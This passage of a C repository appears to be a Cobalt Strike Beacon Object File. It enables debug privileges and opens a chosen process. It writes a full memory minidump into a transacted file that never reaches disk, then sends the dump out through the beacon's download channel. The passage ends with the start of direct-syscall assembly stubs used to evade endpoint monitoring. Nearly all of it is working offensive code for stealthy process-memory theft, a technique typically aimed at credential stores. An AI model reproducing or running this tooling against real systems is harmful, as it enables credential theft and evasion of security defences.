| } 187 | 188 | static void append(struct dump_context* dc, const void* data, unsigned size) 189 | { 190 | writeat(dc, dc->rva, data, size); 191 | dc->rva += size; 192 | } 193 | 194 | static unsigned dump_system_info(struct dump_context* dc) 195 | { 196 | MINIDUMP_SYSTEM_INFO mdSysInfo; 197 | SYSTEM_INFO sysInfo; 198 | OSVERSIONINFOW osInfo; 199 | DWORD written; 200 | ULONG slen; 201 | DWORD wine_extra = 0; 202 | 203 | const char* build_id = NULL; 204 | const char* sys_name = NULL; 205 | const char* release_name = NULL; 206 | 207 | KERNEL32$GetSystemInfo(&sysInfo); 208 | osInfo.dwOSVersionInfoSize = sizeof(osInfo); 209 | 210 | typedef int(WINAPI* RtlGetNtVersionNumbers)(PDWORD, PDWORD, PDWORD); 211 | 212 | HINSTANCE hinst = LoadLibrary("ntdll.dll"); 213 | DWORD dwMajor, dwMinor, dwBuildNumber; 214 | RtlGetNtVersionNumbers proc = (RtlGetNtVersionNumbers)GetProcAddress(hinst, "RtlGetNtVersionNumbers"); 215 | proc(&dwMajor, &dwMinor, &dwBuildNumber); 216 | dwBuildNumber &= 0xffff; 217 | BeaconPrintf(CALLBACK_OUTPUT, "[+] OS Version: %d.%d.%d\n", dwMajor, dwMinor, dwBuildNumber); 218 | FreeLibrary(hinst); 219 | 220 | mdSysInfo.ProcessorArchitecture = sysInfo.wProcessorArchitecture; 221 | mdSysInfo.ProcessorLevel = sysInfo.wProcessorLevel; 222 | mdSysInfo.ProcessorRevision = sysInfo.wProcessorRevision; 223 | mdSysInfo.NumberOfProcessors = (UCHAR)sysInfo.dwNumberOfProcessors; 224 | mdSysInfo.ProductType = VER_NT_WORKSTATION; /* This might need fixing */ 225 | mdSysInfo.MajorVersion = dwMajor; 226 | mdSysInfo.MinorVersion = dwMinor; 227 | mdSysInfo.BuildNumber = dwBuildNumber; 228 | mdSysInfo.PlatformId = 0x2; 229 | 230 | mdSysInfo.CSDVersionRva = dc->rva + sizeof(mdSysInfo) + wine_extra; 231 | mdSysInfo.Reserved1 = 0; 232 | mdSysInfo.SuiteMask = VER_SUITE_TERMINAL; 233 | 234 | unsigned i; 235 | ULONG64 one = 1; 236 | 237 | mdSysInfo.Cpu.OtherCpuInfo.ProcessorFeatures[0] = 0; 238 | mdSysInfo.Cpu.OtherCpuInfo.ProcessorFeatures[1] = 0; 239 | 240 | for (i = 0; i < sizeof(mdSysInfo.Cpu.OtherCpuInfo.ProcessorFeatures[0]) * 8; i++) 241 | if (KERNEL32$IsProcessorFeaturePresent(i)) 242 | mdSysInfo.Cpu.OtherCpuInfo.ProcessorFeatures[0] |= one << i; 243 | 244 | append(dc, &mdSysInfo, sizeof(mdSysInfo)); 245 | 246 | const WCHAR* szCSDVersion = L""; 247 | slen = KERNEL32$lstrlenW(szCSDVersion) * sizeof(WCHAR); 248 | KERNEL32$WriteFile(dc->hFile, &slen, sizeof(slen), &written, NULL); 249 | KERNEL32$WriteFile(dc->hFile, szCSDVersion, slen, &written, NULL); 250 | dc->rva += sizeof(ULONG) + slen; 251 | 252 | return sizeof(mdSysInfo); 253 | } 254 | 255 | void minidump_add_memory_block(struct dump_context* dc, ULONG64 base, ULONG size, ULONG rva) 256 | { 257 | if (!dc->mem) 258 | { 259 | dc->alloc_mem = 32; 260 | dc->mem = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, dc->alloc_mem * sizeof(*dc->mem)); 261 | } 262 | else if (dc->num_mem >= dc->alloc_mem) 263 | { 264 | dc->alloc_mem *= 2; 265 | dc->mem = KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), 0, dc->mem, 266 | dc->alloc_mem * sizeof(*dc->mem)); 267 | } 268 | if (dc->mem) 269 | { 270 | dc->mem[dc->num_mem].base = base; 271 | dc->mem[dc->num_mem].size = size; 272 | dc->mem[dc->num_mem].rva = rva; 273 | dc->num_mem++; 274 | } 275 | else dc->num_mem = dc->alloc_mem = 0; 276 | } 277 | 278 | 279 | static void minidump_add_memory64_block(struct dump_context* dc, ULONG64 base, ULONG64 size) 280 | { 281 | if (!dc->mem64) 282 | { 283 | dc->alloc_mem64 = 32; 284 | dc->mem64 = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, dc->alloc_mem64 * sizeof(*dc->mem64)); 285 | } 286 | else if (dc->num_mem64 >= dc->alloc_mem64) 287 | { 288 | dc->alloc_mem64 *= 2; 289 | dc->mem64 = KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), 0, dc->mem64, 290 | dc->alloc_mem64 * sizeof(*dc->mem64)); 291 | } 292 | if (dc->mem64) 293 | { 294 | dc->mem64[dc->num_mem64].base = base; 295 | dc->mem64[dc->num_mem64].size = size; 296 | dc->num_mem64++; 297 | } 298 | else dc->num_mem64 = dc->alloc_mem64 = 0; 299 | } 300 | 301 | static void fetch_memory64_info(struct dump_context* dc) 302 | { 303 | ULONG_PTR addr; 304 | MEMORY_BASIC_INFORMATION mbi; 305 | 306 | addr = 0; 307 | while (KERNEL32$VirtualQueryEx(dc->handle, (LPCVOID)addr, &mbi, sizeof(mbi)) != 0) 308 | { 309 | /* Memory regions with state MEM_COMMIT will be added to the dump */ 310 | if (mbi.State == MEM_COMMIT) 311 | { 312 | minidump_add_memory64_block(dc, (ULONG_PTR)mbi.BaseAddress, mbi.RegionSize); 313 | } 314 | 315 | if ((addr + mbi.RegionSize) < addr) 316 | break; 317 | 318 | addr = (ULONG_PTR)mbi.BaseAddress + mbi.RegionSize; 319 | } 320 | } 321 | 322 | static inline BOOL read_process_memory(HANDLE process, UINT64 addr, void* buf, size_t size) 323 | { 324 | SIZE_T read = 0; 325 | NTSTATUS res = NtReadVirtualMemory(process, (PVOID*)addr, buf, size, &read); 326 | return !res; 327 | } 328 | 329 | static unsigned dump_memory64_info(struct dump_context* dc) 330 | { 331 | MINIDUMP_MEMORY64_LIST mdMem64List; 332 | MINIDUMP_MEMORY_DESCRIPTOR64 mdMem64; 333 | DWORD written; 334 | unsigned i, len, sz; 335 | RVA rva_base; 336 | char tmp[1024]; 337 | ULONG64 pos; 338 | LARGE_INTEGER filepos; 339 | 340 | sz = sizeof(mdMem64List.NumberOfMemoryRanges) + 341 | sizeof(mdMem64List.BaseRva) + 342 | dc->num_mem64 * sizeof(mdMem64); 343 | 344 | mdMem64List.NumberOfMemoryRanges = dc->num_mem64; 345 | mdMem64List.BaseRva = dc->rva + sz; 346 | 347 | append(dc, &mdMem64List.NumberOfMemoryRanges, 348 | sizeof(mdMem64List.NumberOfMemoryRanges)); 349 | append(dc, &mdMem64List.BaseRva, 350 | sizeof(mdMem64List.BaseRva)); 351 | 352 | rva_base = dc->rva; 353 | dc->rva += dc->num_mem64 * sizeof(mdMem64); 354 | 355 | /* dc->rva is not updated past this point. The end of the dump 356 | * is just the full memory data. */ 357 | filepos.QuadPart = dc->rva; 358 | for (i = 0; i < dc->num_mem64; i++) 359 | { 360 | mdMem64.StartOfMemoryRange = dc->mem64[i].base; 361 | mdMem64.DataSize = dc->mem64[i].size; 362 | KERNEL32$SetFilePointerEx(dc->hFile, filepos, NULL, FILE_BEGIN); 363 | for (pos = 0; pos < dc->mem64[i].size; pos += sizeof(tmp)) 364 | { 365 | len = (unsigned)(min(dc->mem64[i].size - pos, sizeof(tmp))); 366 | if (read_process_memory(dc->handle, dc->mem64[i].base + pos, tmp, len)) 367 | KERNEL32$WriteFile(dc->hFile, tmp, len, &written, NULL); 368 | } 369 | filepos.QuadPart += mdMem64.DataSize; 370 | writeat(dc, rva_base + i * sizeof(mdMem64), &mdMem64, sizeof(mdMem64)); 371 | } 372 | 373 | return sz; 374 | } 375 | 376 | static void fetch_module_versioninfo(LPCWSTR filename, VS_FIXEDFILEINFO* ffi) 377 | { 378 | DWORD handle; 379 | DWORD sz; 380 | static const WCHAR backslashW[] = { '\\', '\0' }; 381 | 382 | MSVCRT$memset(ffi, 0, sizeof(*ffi)); 383 | if ((sz = VERSION$GetFileVersionInfoSizeW(filename, &handle))) 384 | { 385 | void* info = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, sz); 386 | if (info && VERSION$GetFileVersionInfoW(filename, handle, sz, info)) 387 | { 388 | VS_FIXEDFILEINFO* ptr; 389 | UINT len; 390 | 391 | if (VERSION$VerQueryValueW(info, backslashW, (LPVOID*)&ptr, &len)) 392 | MSVCRT$memcpy(ffi, ptr, min(len, sizeof(*ffi))); 393 | } 394 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, info); 395 | } 396 | } 397 | 398 | static unsigned dump_modules(struct dump_context* dc, BOOL dump_elf) 399 | { 400 | MINIDUMP_MODULE mdModule; 401 | MINIDUMP_MODULE_LIST mdModuleList; 402 | char tmp[1024]; 403 | MINIDUMP_STRING* ms = (MINIDUMP_STRING*)tmp; 404 | ULONG i, nmod; 405 | RVA rva_base; 406 | DWORD flags_out; 407 | unsigned sz; 408 | 409 | for (i = nmod = 0; i < dc->num_modules; i++) 410 | { 411 | if ((dc->modules[i].is_elf && dump_elf) || 412 | (!dc->modules[i].is_elf && !dump_elf)) 413 | nmod++; 414 | } 415 | 416 | mdModuleList.NumberOfModules = 0; 417 | rva_base = dc->rva; 418 | dc->rva += sz = sizeof(mdModuleList.NumberOfModules) + sizeof(mdModule) * nmod; 419 | 420 | for (i = 0; i < dc->num_modules; i++) 421 | { 422 | if ((dc->modules[i].is_elf && !dump_elf) || 423 | (!dc->modules[i].is_elf && dump_elf)) 424 | continue; 425 | 426 | flags_out = ModuleWriteModule | ModuleWriteMiscRecord | ModuleWriteCvRecord; 427 | if (dc->type & MiniDumpWithDataSegs) 428 | flags_out |= ModuleWriteDataSeg; 429 | if (dc->type & MiniDumpWithProcessThreadData) 430 | flags_out |= ModuleWriteTlsData; 431 | if (dc->type & MiniDumpWithCodeSegs) 432 | flags_out |= ModuleWriteCodeSegs; 433 | 434 | ms->Length = (KERNEL32$lstrlenW(dc->modules[i].name) + 1) * sizeof(WCHAR); 435 | 436 | KERNEL32$lstrcpyW(ms->Buffer, dc->modules[i].name); 437 | 438 | if (flags_out & ModuleWriteModule) 439 | { 440 | mdModule.BaseOfImage = dc->modules[i].base; 441 | mdModule.SizeOfImage = dc->modules[i].size; 442 | mdModule.CheckSum = dc->modules[i].checksum; 443 | mdModule.TimeDateStamp = dc->modules[i].timestamp; 444 | mdModule.ModuleNameRva = dc->rva; 445 | ms->Length -= sizeof(WCHAR); 446 | append(dc, ms, sizeof(ULONG) + ms->Length + sizeof(WCHAR)); 447 | fetch_module_versioninfo(ms->Buffer, &mdModule.VersionInfo); 448 | mdModule.CvRecord.DataSize = 0; 449 | mdModule.CvRecord.Rva = 0; 450 | mdModule.MiscRecord.DataSize = 0; 451 | mdModule.MiscRecord.Rva = 0; 452 | mdModule.Reserved0 = 0; 453 | mdModule.Reserved1 = 0; 454 | writeat(dc, 455 | rva_base + sizeof(mdModuleList.NumberOfModules) + 456 | mdModuleList.NumberOfModules++ * sizeof(mdModule), 457 | &mdModule, sizeof(mdModule)); 458 | } 459 | } 460 | writeat(dc, rva_base, &mdModuleList.NumberOfModules, 461 | sizeof(mdModuleList.NumberOfModules)); 462 | 463 | return sz; 464 | } 465 | 466 | BOOL validate_addr64(DWORD64 addr) 467 | { 468 | if (sizeof(void*) == sizeof(int) && (addr >> 32)) 469 | { 470 | SetLastError(ERROR_INVALID_PARAMETER); 471 | return FALSE; 472 | } 473 | return TRUE; 474 | } 475 | 476 | BOOL pe_load_nt_header(HANDLE hProc, DWORD64 base, IMAGE_NT_HEADERS* nth) 477 | { 478 | IMAGE_DOS_HEADER dos; 479 | 480 | NTSTATUS res = NtReadVirtualMemory(hProc, (PVOID*)(DWORD_PTR)base, &dos, sizeof(dos), NULL); 481 | 482 | NTSTATUS res2 = NtReadVirtualMemory(hProc, (PVOID*)(DWORD_PTR)(base + dos.e_lfanew), nth, sizeof(*nth), NULL); 483 | 484 | return !res && dos.e_magic == IMAGE_DOS_SIGNATURE && !res2 && nth->Signature == IMAGE_NT_SIGNATURE; 485 | } 486 | 487 | static BOOL add_module(struct dump_context* dc, const WCHAR* name, 488 | DWORD64 base, DWORD size, DWORD timestamp, DWORD checksum, 489 | BOOL is_elf) 490 | { 491 | if (!dc->modules) 492 | { 493 | dc->alloc_modules = 32; 494 | dc->modules = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, 495 | dc->alloc_modules * sizeof(*dc->modules)); 496 | } 497 | else if (dc->num_modules >= dc->alloc_modules) 498 | { 499 | dc->alloc_modules *= 2; 500 | dc->modules = KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), 0, dc->modules, 501 | dc->alloc_modules * sizeof(*dc->modules)); 502 | } 503 | if (!dc->modules) 504 | { 505 | dc->alloc_modules = dc->num_modules = 0; 506 | return FALSE; 507 | } 508 | 509 | PSAPI$GetModuleFileNameExW(dc->handle, (HMODULE)(DWORD_PTR)base, dc->modules[dc->num_modules].name, ARRAY_SIZE(dc->modules[dc->num_modules].name)); 510 | 511 | dc->modules[dc->num_modules].base = base; 512 | dc->modules[dc->num_modules].size = size; 513 | dc->modules[dc->num_modules].timestamp = timestamp; 514 | dc->modules[dc->num_modules].checksum = checksum; 515 | dc->modules[dc->num_modules].is_elf = is_elf; 516 | dc->num_modules++; 517 | 518 | return TRUE; 519 | } 520 | 521 | 522 | static BOOL WINAPI fetch_pe_module_info_cb(PCWSTR name, DWORD64 base, ULONG size, 523 | PVOID user) 524 | { 525 | struct dump_context* dc = user; 526 | IMAGE_NT_HEADERS nth; 527 | 528 | if (!validate_addr64(base)) return FALSE; 529 | 530 | if (pe_load_nt_header(dc->handle, base, &nth)) 531 | add_module(user, name, base, size, 532 | nth.FileHeader.TimeDateStamp, nth.OptionalHeader.CheckSum, 533 | FALSE); 534 | 535 | return TRUE; 536 | } 537 | 538 | 539 | static void fetch_modules_info(struct dump_context* dc) 540 | { 541 | DBGHELP$EnumerateLoadedModulesW64(dc->handle, fetch_pe_module_info_cb, dc); 542 | } 543 | 544 | BOOL MiniDumpWriteDumpA(HANDLE hProcess, DWORD pid, HANDLE hFile) 545 | { 546 | static const MINIDUMP_DIRECTORY emptyDir = { UnusedStream, {0, 0} }; 547 | MINIDUMP_HEADER mdHead; 548 | MINIDUMP_DIRECTORY mdDir; 549 | DWORD i, nStreams, idx_stream; 550 | struct dump_context dc; 551 | BOOL sym_initialized = FALSE; 552 | 553 | const DWORD Flags = MiniDumpWithFullMemory | 554 | MiniDumpWithFullMemoryInfo | 555 | MiniDumpWithUnloadedModules; 556 | 557 | MINIDUMP_TYPE DumpType = (MINIDUMP_TYPE)Flags; 558 | 559 | if (!(sym_initialized = DBGHELP$SymInitializeW(hProcess, NULL, TRUE))) 560 | { 561 | DWORD err = KERNEL32$GetLastError(); 562 | return FALSE; 563 | } 564 | 565 | dc.hFile = hFile; 566 | dc.pid = pid; 567 | dc.handle = hProcess; 568 | dc.modules = NULL; 569 | dc.num_modules = 0; 570 | dc.alloc_modules = 0; 571 | dc.threads = NULL; 572 | dc.num_threads = 0; 573 | dc.type = DumpType; 574 | dc.mem = NULL; 575 | dc.num_mem = 0; 576 | dc.alloc_mem = 0; 577 | dc.mem64 = NULL; 578 | dc.num_mem64 = 0; 579 | dc.alloc_mem64 = 0; 580 | dc.rva = 0; 581 | 582 | if (!fetch_process_info(&dc)) return FALSE; 583 | 584 | fetch_modules_info(&dc); 585 | 586 | nStreams = 3; 587 | nStreams = (nStreams + 3) & ~3; 588 | 589 | // Write Header 590 | mdHead.Signature = MINIDUMP_SIGNATURE; 591 | mdHead.Version = MINIDUMP_VERSION; 592 | mdHead.NumberOfStreams = nStreams; 593 | mdHead.CheckSum = 0; 594 | mdHead.StreamDirectoryRva = sizeof(mdHead); 595 | //mdHead.TimeDateStamp = time(NULL); 596 | mdHead.Flags = DumpType; 597 | append(&dc, &mdHead, sizeof(mdHead)); 598 | 599 | // Write Stream Directories 600 | dc.rva += nStreams * sizeof(mdDir); 601 | idx_stream = 0; 602 | 603 | // Write Data Stream Directories 604 | // 605 | 606 | // Must be first in MiniDump 607 | mdDir.StreamType = SystemInfoStream; 608 | mdDir.Location.Rva = dc.rva; 609 | mdDir.Location.DataSize = dump_system_info(&dc); 610 | writeat(&dc, mdHead.StreamDirectoryRva + idx_stream++ * sizeof(mdDir), 611 | &mdDir, sizeof(mdDir)); 612 | 613 | mdDir.StreamType = ModuleListStream; 614 | mdDir.Location.Rva = dc.rva; 615 | mdDir.Location.DataSize = dump_modules(&dc, FALSE); 616 | writeat(&dc, mdHead.StreamDirectoryRva + idx_stream++ * sizeof(mdDir), 617 | &mdDir, sizeof(mdDir)); 618 | 619 | fetch_memory64_info(&dc); 620 | 621 | mdDir.StreamType = Memory64ListStream; 622 | mdDir.Location.Rva = dc.rva; 623 | mdDir.Location.DataSize = dump_memory64_info(&dc); 624 | writeat(&dc, mdHead.StreamDirectoryRva + idx_stream++ * sizeof(mdDir), 625 | &mdDir, sizeof(mdDir)); 626 | 627 | // fill the remaining directory entries with 0's (unused stream types) 628 | // NOTE: this should always come last in the dump! 629 | for (i = idx_stream; i < nStreams; i++) 630 | writeat(&dc, mdHead.StreamDirectoryRva + i * sizeof(emptyDir), &emptyDir, sizeof(emptyDir)); 631 | 632 | if (sym_initialized) 633 | DBGHELP$SymCleanup(hProcess); 634 | 635 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, dc.mem); 636 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, dc.mem64); 637 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, dc.modules); 638 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, dc.threads); 639 | 640 | return TRUE; 641 | } 642 | 643 | void EnableDebugPriv() 644 | { 645 | HANDLE hToken; 646 | TOKEN_PRIVILEGES tkp; 647 | NTSTATUS status = NtOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken); 648 | 649 | if(status != STATUS_SUCCESS){ 650 | BeaconPrintf(CALLBACK_ERROR, "Failed to open process token\n"); 651 | } 652 | 653 | tkp.PrivilegeCount = 1; 654 | tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 655 | 656 | LPCWSTR lpwPriv = L"SeDebugPrivilege"; 657 | if (!ADVAPI32$LookupPrivilegeValueW(NULL, lpwPriv, &tkp.Privileges[0].Luid)) { 658 | NtClose(hToken); 659 | } 660 | 661 | status = NtAdjustPrivilegesToken(hToken, FALSE, &tkp, sizeof(TOKEN_PRIVILEGES), NULL, NULL); 662 | 663 | if (status != STATUS_SUCCESS){ 664 | BeaconPrintf(CALLBACK_ERROR, "Failed to adjust process token"); 665 | } 666 | 667 | NtClose(hToken); 668 | } 669 | 670 | HANDLE GetProcessHandle(DWORD dwPid) { 671 | 672 | NTSTATUS status; 673 | HANDLE hProcess = NULL; 674 | OBJECT_ATTRIBUTES ObjectAttributes; 675 | 676 | InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL); 677 | CLIENT_ID uPid = { 0 }; 678 | 679 | uPid.UniqueProcess = (HANDLE)(DWORD_PTR)dwPid; 680 | uPid.UniqueThread = (HANDLE)0; 681 | 682 | status = NtOpenProcess(&hProcess, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, &ObjectAttributes, &uPid); 683 | if (hProcess == NULL) { 684 | return NULL; 685 | } 686 | 687 | return hProcess; 688 | } 689 | /*End MiniDumpWriteDump reactOS Code*/ 690 | 691 | //Entry Function 692 | void go(char* args, int length) { 693 | 694 | //Beacon parser stuff 695 | datap parser; 696 | DWORD PID; 697 | char* outputFile; 698 | BeaconDataParse(&parser, args, length); 699 | PID = BeaconDataInt(&parser); 700 | outputFile = BeaconDataExtract(&parser, NULL); 701 | int outputFileLength = BeaconDataInt(&parser); 702 | 703 | //Declare variables 704 | void* returnData = NULL; 705 | HANDLE hProc = INVALID_HANDLE_VALUE; 706 | HANDLE hFile = INVALID_HANDLE_VALUE; 707 | HANDLE tFile = INVALID_HANDLE_VALUE; 708 | HANDLE mapFile = INVALID_HANDLE_VALUE; 709 | BOOL success = 0; 710 | NTSTATUS status = 0; 711 | SIZE_T ViewSize = 0; 712 | OBJECT_ATTRIBUTES objAttr; 713 | CLIENT_ID cID; 714 | InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL); 715 | cID.UniqueProcess = (PVOID)PID; 716 | cID.UniqueThread = 0; 717 | IO_STATUS_BLOCK IoStatusBlock; 718 | 719 | //Get pointer to RtlSetCurrentTransaction and RtlInitUnicodeString 720 | _RtlSetCurrentTransaction RtlSetCurrentTransaction = (_RtlSetCurrentTransaction) GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlSetCurrentTransaction"); 721 | _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString) GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString"); 722 | 723 | //Enable Debug Privs 724 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Attempting To Enable Debug Privs\n"); 725 | EnableDebugPriv(); 726 | 727 | //Open target process and if successful attempt to dump memory 728 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Attempting To Dump Proccess %d\n", PID); 729 | status = NtOpenProcess(&hProc, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, &objAttr, &cID); 730 | 731 | if (status != 0) { 732 | 733 | BeaconPrintf(CALLBACK_ERROR, "[-] NtOpenProcess failed with status %lx\n", status); 734 | return; 735 | } 736 | else { 737 | 738 | BeaconPrintf(CALLBACK_OUTPUT, "[+] NtOpenProcess returned HANDLE 0x%p\n", hProc); 739 | } 740 | 741 | //Create Transaction 742 | status = NtCreateTransaction(&tFile, TRANSACTION_ALL_ACCESS, &objAttr, NULL, NULL, 0, 0, 0, NULL, NULL); 743 | 744 | if (status != 0) { 745 | 746 | BeaconPrintf(CALLBACK_OUTPUT, "[-] NtCreateTransaction failed with status %lx\n", status); 747 | return; 748 | } 749 | else { 750 | 751 | BeaconPrintf(CALLBACK_OUTPUT, "[+] NtCreateTransaction returned HANDLE 0x%p\n", tFile); 752 | } 753 | 754 | //Set Current Transaction 755 | status = RtlSetCurrentTransaction(tFile); 756 | 757 | if (status != 1) { 758 | 759 | BeaconPrintf(CALLBACK_OUTPUT, "[-] RtlSetCurrentTransaction failed with status %lx\n", status); 760 | return; 761 | } 762 | else { 763 | 764 | BeaconPrintf(CALLBACK_OUTPUT, "[+] RtlSetCurrentTransaction successfully set\n"); 765 | } 766 | 767 | //Set some arbitrary file path 768 | PCWSTR filePath = L"\\??\\C:\\SomeBogusFile.txt"; 769 | UNICODE_STRING unicodeString; 770 | RtlInitUnicodeString(&unicodeString, filePath); 771 | 772 | InitializeObjectAttributes(&objAttr, &unicodeString, OBJ_CASE_INSENSITIVE, NULL, NULL); 773 | 774 | const int allocSize = 0; 775 | LARGE_INTEGER largeInteger; 776 | largeInteger.QuadPart = allocSize; 777 | 778 | //Create File 779 | status = NtCreateFile(&hFile, FILE_GENERIC_READ | FILE_GENERIC_WRITE | SYNCHRONIZE, &objAttr, &IoStatusBlock, &largeInteger, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE | FILE_SHARE_READ, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); 780 | if (status != 0) { 781 | 782 | BeaconPrintf(CALLBACK_OUTPUT, "[-] NtCreateFile failed with status %lx\n", status); 783 | return; 784 | } 785 | else { 786 | BeaconPrintf(CALLBACK_OUTPUT, "[+] NtCreateFile returned HANDLE 0x%p\n", hFile); 787 | } 788 | 789 | //Set Current Transaction 790 | status = RtlSetCurrentTransaction(0); 791 | 792 | if (status != 1) { 793 | 794 | BeaconPrintf(CALLBACK_OUTPUT, "[-] RtlSetCurrentTransaction failed with status %lx\n", status); 795 | return; 796 | } 797 | else { 798 | 799 | BeaconPrintf(CALLBACK_OUTPUT, "[+] RtlSetCurrentTransaction successfully set\n", status); 800 | } 801 | 802 | //Create MiniDump using ReactOS minidumpwritedump code 803 | success = MiniDumpWriteDumpA(hProc, PID, hFile); 804 | 805 | if (success = 0) { 806 | BeaconPrintf(CALLBACK_OUTPUT, "[-] MiniDump failed. GetLastError = (%ld)\n", KERNEL32$GetLastError()); 807 | return; 808 | } 809 | else 810 | { 811 | BeaconPrintf(CALLBACK_OUTPUT, "[+] MiniDump written to memory\n"); 812 | } 813 | 814 | //Get size of MiniDump 815 | LARGE_INTEGER fs; 816 | success = KERNEL32$GetFileSizeEx(hFile, &fs); 817 | unsigned long long fileSize = fs.QuadPart; 818 | BeaconPrintf(CALLBACK_OUTPUT, "[+] MiniDump Size In Bytes = %d\n", fileSize); 819 | 820 | //Create mapped file and read dump contents into buffer 821 | status = NtCreateSection(&mapFile, SECTION_MAP_READ, 0, &largeInteger, PAGE_READONLY, SEC_COMMIT, hFile); 822 | 823 | if (status != 0) { 824 | 825 | BeaconPrintf(CALLBACK_OUTPUT, "[-] NtCreateSection failed with status %lx\n", status); 826 | return; 827 | } 828 | else { 829 | 830 | BeaconPrintf(CALLBACK_OUTPUT, "[+] NtCreateSection created\n"); 831 | } 832 | 833 | status = NtMapViewOfSection(mapFile, (HANDLE)-1, &returnData, 0, 0, 0, &ViewSize, ViewUnmap, 0, PAGE_READONLY); 834 | 835 | if (status != 0) { 836 | 837 | BeaconPrintf(CALLBACK_OUTPUT, "[-] NtMapViewOfSection failed with status %lx\n", status); 838 | return; 839 | } 840 | else { 841 | 842 | BeaconPrintf(CALLBACK_OUTPUT, "[+] NtMapViewOfSection successful\n"); 843 | 844 | } 845 | 846 | /*Note: At this point returnData holds our memory dump -> You could choose to encrypt it, compress it, write it to disk somwhere, whatever. You do you but we are going to download it via beacons native download API*/ 847 | 848 | //If no output name is provided, the format will be "Mem:\[pid].dmp" 849 | int downloadFileNameLength; 850 | char* fileName; 851 | 852 | if(!outputFile) { 853 | //No name was provided, so we will use the pid as the basename 854 | downloadFileNameLength = MSVCRT$_snprintf(NULL,0,"%i",PID) + 9; 855 | fileName = (char*) MSVCRT$malloc(downloadFileNameLength); 856 | MSVCRT$sprintf(fileName, "mem:\\%d.dmp", PID); 857 | } else { 858 | //User provided a name to use for output 859 | downloadFileNameLength = outputFileLength + 9; 860 | fileName = (char*) MSVCRT$malloc(downloadFileNameLength); 861 | MSVCRT$sprintf(fileName, "mem:\\%s.dmp", outputFile); 862 | } 863 | 864 | //Download memory dump 865 | downloadFile(fileName, downloadFileNameLength, returnData, fileSize); 866 | 867 | //Close Handles 868 | status = NtClose(hProc); 869 | status = NtClose(tFile); 870 | status = NtClose(hFile); 871 | 872 | return; 873 | } 874 | -------------------------------------------------------------------------------- /src/syscalls-asm.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "syscalls.h" 3 | 4 | #define ZwCreateFile NtCreateFile 5 | __asm__("NtCreateFile: \n\ 6 | mov rax, gs:[0x60] \n\ 7 | NtCreateFile_Check_X_X_XXXX: \n\ 8 | cmp dword ptr [rax+0x118], 6 \n\ 9 | je NtCreateFile_Check_6_X_XXXX \n\ 10 | cmp dword ptr [rax+0x118], 10 \n\ 11 | je NtCreateFile_Check_10_0_XXXX \n\ 12 | jmp NtCreateFile_SystemCall_Unknown \n\ 13 | NtCreateFile_Check_6_X_XXXX: \n\ 14 | cmp dword ptr [rax+0x11c], 1 \n\ 15 | je NtCreateFile_Check_6_1_XXXX \n\ 16 | cmp dword ptr [rax+0x11c], 2 \n\ 17 | je NtCreateFile_SystemCall_6_2_XXXX \n\ 18 | cmp dword ptr [rax+0x11c], 3 \n\ 19 | je NtCreateFile_SystemCall_6_3_XXXX \n\ 20 | jmp NtCreateFile_SystemCall_Unknown \n\ 21 | NtCreateFile_Check_6_1_XXXX: \n\ 22 | cmp word ptr [rax+0x120], 7600 \n\ 23 | je NtCreateFile_SystemCall_6_1_7600 \n\ 24 | cmp word ptr [rax+0x120], 7601 \n\ 25 | je NtCreateFile_SystemCall_6_1_7601 \n\ 26 | jmp NtCreateFile_SystemCall_Unknown \n\ 27 | NtCreateFile_Check_10_0_XXXX: \n\ 28 | cmp word ptr [rax+0x120], 10240 \n\ 29 | je NtCreateFile_SystemCall_10_0_10240 \n\ 30 | cmp word ptr [rax+0x120], 10586 \n\ 31 | je NtCreateFile_SystemCall_10_0_10586 \n\ 32 | cmp word ptr [rax+0x120], 14393 \n\ 33 | je NtCreateFile_SystemCall_10_0_14393 \n\ 34 | cmp word ptr [rax+0x120], 15063 \n\ 35 | je NtCreateFile_SystemCall_10_0_15063 \n\ 36 | cmp word ptr [rax+0x120], 16299 \n\ 37 | je NtCreateFile_SystemCall_10_0_16299 \n\ 38 | cmp word ptr [rax+0x120], 17134 \n\ 39 | je NtCreateFile_SystemCall_10_0_17134 \n\ 40 | cmp word ptr [rax+0x120], 17763 \n\ 41 | je NtCreateFile_SystemCall_10_0_17763 \n\ 42 | cmp word ptr [rax+0x120], 18362 \n\ 43 | je NtCreateFile_SystemCall_10_0_18362 \n\ 44 | cmp word ptr [rax+0x120], 18363 \n\ 45 | je NtCreateFile_SystemCall_10_0_18363 \n\ 46 | cmp word ptr [rax+0x120], 19041 \n\ 47 | je NtCreateFile_SystemCall_10_0_19041 \n\ 48 | cmp word ptr [rax+0x120], 19042 \n\ 49 | je NtCreateFile_SystemCall_10_0_19042 \n\ 50 | jmp NtCreateFile_SystemCall_Unknown \n\ 51 | NtCreateFile_SystemCall_6_1_7600: \n\ 52 | mov eax, 0x0052 \n\ 53 | jmp NtCreateFile_Epilogue \n\ 54 | NtCreateFile_SystemCall_6_1_7601: \n\ 55 | mov eax, 0x0052 \n\ 56 | jmp 